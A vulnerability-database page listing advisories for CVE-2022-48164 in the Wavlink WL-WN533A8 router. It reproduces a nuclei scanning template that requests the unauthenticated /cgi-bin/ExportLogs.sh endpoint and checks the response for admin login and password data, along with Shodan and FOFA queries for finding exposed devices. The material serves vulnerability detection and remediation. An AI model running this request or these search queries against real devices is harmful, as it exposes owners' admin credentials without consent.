Lucene search
K

Wavlink WL-WN533A8 M33A8.V5030.190716 - Information Disclosure

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 17 Views

An access control issue in Wavlink WL-WN533A8 M33A8.V5030.190716 allows unauthenticated attackers to download configuration data and log files and obtain admin credentials, potentially leading to sensitive information disclosure

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2022-48164
6 Feb 202316:22
circl
CNNVD
WAVLINK WL-WN533A8 安全漏洞
6 Feb 202300:00
cnnvd
CNVD
WAVLINK WL-WN533A8 Access Control Issue Vulnerability
8 Feb 202300:00
cnvd
CVE
CVE-2022-48164
6 Feb 202300:00
cve
Cvelist
CVE-2022-48164
6 Feb 202300:00
cvelist
NVD
CVE-2022-48164
6 Feb 202314:15
nvd
OSV
CVE-2022-48164
6 Feb 202314:15
osv
Prion
Design/Logic Flaw
6 Feb 202314:15
prion
RedhatCVE
CVE-2022-48164
23 May 202500:31
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2022-48164
12 May 202500:00
vulncheck_kev
Rows per page
id: CVE-2022-48164

info:
  name: Wavlink WL-WN533A8 M33A8.V5030.190716 - Information Disclosure
  author: ritikchaddha
  severity: high
  description: |
    An access control issue in the component /cgi-bin/ExportLogs.sh of Wavlink WL-WN533A8 M33A8.V5030.190716 allows unauthenticated attackers to download configuration data and log files and obtain admin credentials.
  remediation: |
    Apply the latest firmware updates from Wavlink or implement network segmentation to restrict access to the device administration interface.
  impact: |
    Successful exploitation could lead to sensitive information disclosure.
  reference:
    - https://docs.google.com/document/d/1JgqpBYRxyU0WKDSqkvi4Yo0723k7mrIUeuH9i1eEs8U/edit?tab=t.0
    - https://nvd.nist.gov/vuln/detail/CVE-2022-48164
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-48164
    epss-score: 0.03096
    epss-percentile: 0.86144
    cpe: cpe:2.3:o:wavlink:wl-wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: wavlink
    product: wl-wn533a8_firmware
    shodan-query: html:"WN533A8"
    fofa-query: body="WN533A8"
  tags: cve,cve2022,wavlink,exposure,wn533a8,vkev,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "WN533A8")'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/ExportLogs.sh"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "Login=", "Password=", "WiFi_", "WAVLINK")'
          - 'contains(content_type, "application/octet-stream")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a0048304602210097e90e5658095daa343ad8faaace0692035c48997a0a5cc37eb3c4d3c32182e10221009166f57ba87a9057bacbd1d571e83e7a606e7e1383ac3e53ba32839d691288d6:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation